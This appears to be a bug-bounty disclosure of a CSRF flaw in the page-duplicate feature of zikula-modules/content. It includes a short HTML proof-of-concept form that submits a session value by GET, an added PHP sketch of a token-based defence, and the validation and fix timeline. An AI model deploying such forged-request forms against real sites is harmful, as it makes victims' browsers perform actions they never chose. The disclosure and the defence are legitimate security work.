Cross-Site Request Forgery (CSRF) in zikula-modules/content


Reported on Dec 27th 2021


There is no CSRF protection for the content page duplicate functionality.

Proof of Concept

<!DOCTYPE html>
<html>
<body>
<form method="GET" action="">
<input type="text" name="_zsid" value="aus942jl2kph2f9mrlc0520pmm">
<input type="submit" value="Send">
</form>
</body>
</html>



This vulnerability is capable of creating a large number of duplicates when malicious links are clicked.
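The following is an added example, not part of the original report and not the project's fix: a sketch of how a duplicate action can refuse the kind of request shown in the proof of concept, by accepting only POST and requiring a per-session token. All function names, the `csrf_duplicate` session key and the `_token` field are hypothetical, and the session is passed in as an array so the logic runs from the PHP CLI.

```php
<?php
declare(strict_types=1);

/** Create (once per session) the secret that the duplicate form must echo back. */
function issueCsrfToken(array &$session): string
{
    if (!isset($session['csrf_duplicate'])) {
        $session['csrf_duplicate'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_duplicate'];
}

/** Return the HTTP status the (hypothetical) duplicate endpoint answers with. */
function handleDuplicate(string $method, array $post, array $session): int
{
    // State-changing action: refuse GET so a plain link or form cannot trigger it.
    if ($method !== 'POST') {
        return 405;
    }
    $expected = $session['csrf_duplicate'] ?? '';
    $supplied = $post['_token'] ?? '';
    // The token is read from the POST body only and compared in constant time.
    if (!is_string($supplied) || $expected === '' || !hash_equals($expected, $supplied)) {
        return 403;
    }
    // The actual page duplication would run here.
    return 200;
}

// Constructed requests; each one arrives with the victim's valid session.
$session = [];
$token = issueCsrfToken($session);
$cases = [
    'GET request (as in the PoC)' => ['GET',  []],
    'POST without token'          => ['POST', ['id' => '7']],
    'POST with wrong token'       => ['POST', ['id' => '7', '_token' => str_repeat('0', 64)]],
    'POST with session token'     => ['POST', ['id' => '7', '_token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    printf("%-28s -> %d\n", $label, handleDuplicate($method, $post, $session));
}
```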

We are processing your report and will contact the zikula-modules/content team within 24 hours. (a year ago)
We have contacted a member of the zikula-modules/content team and are waiting to hear back. (a year ago)
Axel Guckelsberger validated this vulnerability (a year ago)
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
Axel Guckelsberger marked this as fixed in 5.3.0 with commit 5e9bb4 (a year ago)
The fix bounty has been dropped
This vulnerability will not receive a CVE